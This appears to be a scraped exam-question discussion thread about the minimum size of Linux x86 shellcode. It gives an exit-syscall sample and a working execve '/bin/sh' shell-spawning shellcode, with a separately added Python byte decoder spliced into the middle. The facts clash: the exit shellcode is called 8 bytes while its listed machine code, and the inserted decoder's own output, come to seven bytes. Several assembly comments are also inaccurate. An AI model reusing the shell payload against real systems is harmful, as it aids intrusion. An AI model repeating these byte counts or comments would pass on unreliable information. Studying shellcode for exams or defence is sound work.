8 bytes
System Call Structure:
- Linux uses syscalls to interact with the kernel, and these are invoked using specific registers.
- The syscall for exit(0) (terminating the process) is one of the simplest examples.
8-Byte Example Shellcode (assembly code):
```assembly
xor eax, eax ; Clears EAX register (sets exit code to 0)
inc eax      ; Sets EAX to 1 (syscall number for `exit`)
xor ebx, ebx ; Clears EBX register (exit code argument)
int 0x80     ; Trigger the syscall interrupt
```
This shellcode:
- Sets up the syscall number for exit (1 in EAX).
- Clears the EBX register (sets exit code to 0).
- Executes the syscall with int 0x80.
Byte Representation (Machine Code):
The above assembly translates to an 8-byte machine code sequence (hexadecimal):
31 C0 40 31 DB CD 80
This is functional and minimal shellcode.
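As an added example (not code from the post or from ExamTopics), this Python sketch length-decodes the byte string quoted above and reports the instruction boundaries, the total size, and the syscall reached at `int 0x80`. It handles only the three opcode forms in that string; `decode`, `POSTED`, `REGS` and `SYSCALLS` are names made up for this illustration.

```python
# Added example: length-decode the bytes quoted in the post (x86, 32-bit mode).
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
SYSCALLS = {1: "exit"}  # i386 syscall number named in the post
POSTED = bytes.fromhex("31 C0 40 31 DB CD 80")  # copied from the post


def decode(code):
    """Return ([(offset, length, text)], [(syscall name, EBX value)])."""
    insns, calls, known, i = [], [], {}, 0
    while i < len(code):
        op = code[i]
        if op in (0x31, 0xCD) and i + 1 >= len(code):
            raise ValueError(f"truncated instruction at offset {i}")
        if op == 0x31:  # xor r/m32, r32; only register-direct ModRM handled
            modrm = code[i + 1]
            if modrm >> 6 != 3:
                raise ValueError(f"memory operand at offset {i} not handled")
            dst, src = REGS[modrm & 7], REGS[(modrm >> 3) & 7]
            if dst == src:
                known[dst] = 0  # xor reg, reg always yields zero
            else:
                known.pop(dst, None)  # value no longer known
            size, text = 2, f"xor {dst}, {src}"
        elif 0x40 <= op <= 0x47:  # inc r32 (one byte in 32-bit mode)
            reg = REGS[op - 0x40]
            if reg in known:
                known[reg] = (known[reg] + 1) & 0xFFFFFFFF
            size, text = 1, f"inc {reg}"
        elif op == 0xCD:  # int imm8
            vector = code[i + 1]
            if vector == 0x80:  # legacy i386 syscall gate
                name = SYSCALLS.get(known.get("eax"), "unknown")
                calls.append((name, known.get("ebx")))
            size, text = 2, f"int 0x{vector:02x}"
        else:
            raise ValueError(f"opcode 0x{op:02x} at offset {i} not handled")
        insns.append((i, size, text))
        i += size
    return insns, calls


if __name__ == "__main__":
    insns, calls = decode(POSTED)
    for offset, size, text in insns:
        print(f"{offset:2d}  {POSTED[offset:offset + size].hex(' '):<6} {text}")
    print("total bytes:", sum(size for _, size, _ in insns), "syscalls:", calls)
```

Run on the quoted string, the decoder finds four instructions occupying seven bytes and a single `exit` call with EBX equal to 0.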
Here's a basic example of a small Linux shellcode in x86 assembly for spawning a shell:
```assembly
section .text
global _start
_start:
xor eax, eax ; Clear EAX register
push eax ; Push a null byte onto the stack (terminating null)
push 0x68732f2f ; Push "/bin/sh" onto the stack
push 0x6e69622f
mov ebx, esp ; Set EBX to point to the string "/bin/sh"
push eax ; Push a null byte onto the stack (end of string)
mov edx, esp ; Set EDX to point to the null byte
push ebx ; Push the address of "/bin/sh" (EBX) onto the stack
mov ecx, esp ; Set ECX to point to the address of "/bin/sh"
mov al, 0xb ; Set AL to 11, which is the syscall number for execve
int 0x80 ; Call the kernel to execute "/bin/sh"
```
This is a minimal shellcode that spawns a shell ("/bin/sh") and is only 23 bytes in size.
--> 24 bytes
I'm pretty sure the answer is actually 8, unless this question is outdated. You can find a number of examples of Linux shellcode on the internet that are smaller than 24 bytes. I've seen one as small as 10.
upvoted 3 times
044f354, 1 week, 5 days ago
torabi123, 1 month, 2 weeks ago
BarryMacockener, 1 year, 1 month ago